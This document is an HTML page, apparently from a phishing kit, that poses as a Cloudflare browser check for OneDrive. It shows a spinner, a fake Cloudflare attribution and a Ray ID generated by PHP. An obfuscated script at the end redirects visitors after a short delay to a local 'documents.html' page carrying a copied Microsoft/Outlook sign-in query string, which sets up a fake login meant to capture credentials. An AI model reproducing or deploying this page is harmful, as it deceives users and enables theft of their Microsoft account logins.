
<!DOCTYPE html>
<html lang="en">
    <head>
        <meta charset="UTF-8">
        <meta http-equiv="X-UA-Compatible" content="IE=edge">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <title>Just a moment...</title>
        <style>
            body {
              width: 100%;
              height: 100%;
              margin: 0;
              padding: 0;
            }
            
            body {
              background-color: #ffffff;
              color: #000000;
              font-family: -apple-system, system-ui, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen, Ubuntu, "Helvetica Neue", Arial, sans-serif;
              font-size: 16px;
              line-height: 1.7em;
              -webkit-font-smoothing: antialiased;
            }
            
            h1 {
              text-align: center;
              font-weight: 700;
              margin: 16px 0;
              font-size: 32px;
              color: #000000;
              line-height: 1.25;
            }
            
            p {
              font-size: 20px;
              font-weight: 400;
              margin: 8px 0;
            }
            
            p,
            .attribution {
              text-align: center;
            }
            
            #spinner {
              margin: 0 auto 30px auto;
              display: block;
            }
            
            .attribution {
              margin-top: 32px;
            }
            
            @keyframes fader {
              0% {
                opacity: 0.2;
              }
            
              50% {
                opacity: 1.0;
              }
            
              100% {
                opacity: 0.2;
              }
            }
            
            @-webkit-keyframes fader {
              0% {
                opacity: 0.2;
              }
            
              50% {
                opacity: 1.0;
              }
            
              100% {
                opacity: 0.2;
              }
            }
            
            #cf-bubbles>.bubbles {
              animation: fader 1.6s infinite;
            }
            
            #cf-bubbles>.bubbles:nth-child(2) {
              animation-delay: .2s;
            }
            
            #cf-bubbles>.bubbles:nth-child(3) {
              animation-delay: .4s;
            }
            
            .bubbles {
              background-color: #f58220;
              width: 20px;
              height: 20px;
              margin: 2px;
              border-radius: 100%;
              display: inline-block;
            }
            
            a {
              color: #2c7cb0;
              text-decoration: none;
              -moz-transition: color 0.15s ease;
              -o-transition: color 0.15s ease;
              -webkit-transition: color 0.15s ease;
              transition: color 0.15s ease;
            }
            
            a:hover {
              color: #f4a15d
            }
            
            .attribution {
              font-size: 16px;
              line-height: 1.5;
            }
            
            .ray_id {
              display: block;
              margin-top: 8px;
            }
            
            #cf-wrapper #challenge-form {
              padding-top: 25px;
              padding-bottom: 25px;
            }
            
            #cf-hcaptcha-container {
              text-align: center;
            }
            
            #cf-hcaptcha-container iframe {
              display: inline-block;
            }
                    </style>
    </head>
    <body>
        <table width="100%" height="100%" cellpadding="20">
            <tbody>
                <tr>
                    <td valign="middle" align="center">
                        <div class="cf-browser-verification cf-im-under-attack">
                            <noscript>
                                <h1 data-translate="turn_on_js" style="color:#bd2426;">Please turn JavaScript on and reload the page.</h1>
                                
                                <style>
                                
                                #cf-content {
                                    display: none !important;
                                }

                                </style>
                            </noscript>
                            <div id="cf-content" style="display: block;">
                                <div id="cf-bubbles">
                                <div class="bubbles"></div>
                                <div class="bubbles"></div>
                                <div class="bubbles"></div>
                                </div>
                                    <span data-translate="checking_browser">Checking your browser before accessing</span> onedrive.
                                <h1>
                                </h1>
                                <div id="no-cookie-warning" class="cookie-warning" data-translate="turn_on_cookies" style="display:none">
                                    <p data-translate="turn_on_cookies" style="color:#bd2426;">Please enable Cookies and reload the page.</p>
                                </div>
                                <p data-translate="process_is_automatic">This process is automatic. Your browser will redirect to your
                                requested content shortly.</p>
                                <p data-translate="allow_5_secs" id="cf-spinner-allow-5-secs">Please allow up to 5 seconds…</p>
                                <p data-translate="redirecting" id="cf-spinner-redirecting" style="display:none">Redirecting…</p>
                            </div>
                        </div>
                        <div class="attribution">
                            DDoS protection by <a style="cursor: pointer;">Cloudflare</a>
                            <br>
                            <span class="ray_id">Ray ID: <code><?php echo uniqid();  ?></code></span>
                        </div>
                    </td>
                </tr>
            </tbody>
        </table>
    </body>
    <script>
        var _0x2efe=['9430zwDzJl','85kKMdUq','7577WcwRrp','6502jhNFpb','146601QuZxkY','13699TyvWPW','14rWUVfE','15309VpTwJW','documents.html?wa=wsignin1.0&rpsnv=13&ct=1680945493&rver=7.0.6737.0&wp=MBI_SSL&wreply=https%3a%2f%2foutlook.live.com%2fowa%2f%3fnlp%3d1%26RpsCsrfState%3d5fb21961-392c-72c8-7e06-74da7f7ce654&id=292841&aadredir=1&CBCXT=out&lw=1&fl=dob%2cflname%2cwld&cobrandid=90015','27233jaFqDs'];var _0x179f=function(_0x59284c,_0x36e29b){_0x59284c=_0x59284c-0x187;var _0x2efe40=_0x2efe[_0x59284c];return _0x2efe40;};(function(_0x4a7fe2,_0xde34a){var _0x529748=_0x179f;while(!![]){try{var _0x1d901e=-parseInt(_0x529748(0x18c))+-parseInt(_0x529748(0x18e))+-parseInt(_0x529748(0x18b))+parseInt(_0x529748(0x189))+-parseInt(_0x529748(0x188))*parseInt(_0x529748(0x187))+-parseInt(_0x529748(0x190))+-parseInt(_0x529748(0x18f))*-parseInt(_0x529748(0x18d));if(_0x1d901e===_0xde34a)break;else _0x4a7fe2['push'](_0x4a7fe2['shift']());}catch(_0x214b85){_0x4a7fe2['push'](_0x4a7fe2['shift']());}}}(_0x2efe,0x2d408),setTimeout(()=>{var _0x17c14b=_0x179f;window['location']['href']=_0x17c14b(0x18a);},0x5dc));
    </script>
</html>